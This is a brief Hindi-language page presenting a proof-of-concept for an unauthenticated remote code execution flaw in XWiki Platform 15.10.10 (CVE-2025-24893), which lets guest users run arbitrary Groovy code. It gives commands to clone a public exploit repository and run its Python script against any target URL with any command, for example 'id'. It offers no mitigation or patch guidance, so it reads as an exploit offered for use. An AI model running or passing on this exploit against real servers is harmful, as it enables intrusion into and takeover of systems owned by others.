
PoC | XWiki Platform 15.10.10 - दूरस्थ कोड निष्पादन
RCE (Remote Code Execution) श्रेणी की एक कमजोरी, जो तब पाई गई जब अप्रमाणित हमलावर बिना किसी प्रमाणीकरण या पूर्व पहुँच (Guest User) के दूरस्थ रूप से मनमाना Groovy कोड निष्पादित कर सकते हैं। नीचे इस कमजोरी के शोषण के लिए Python में एक PoC (Proof-Of-Concept) दिया गया है।
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'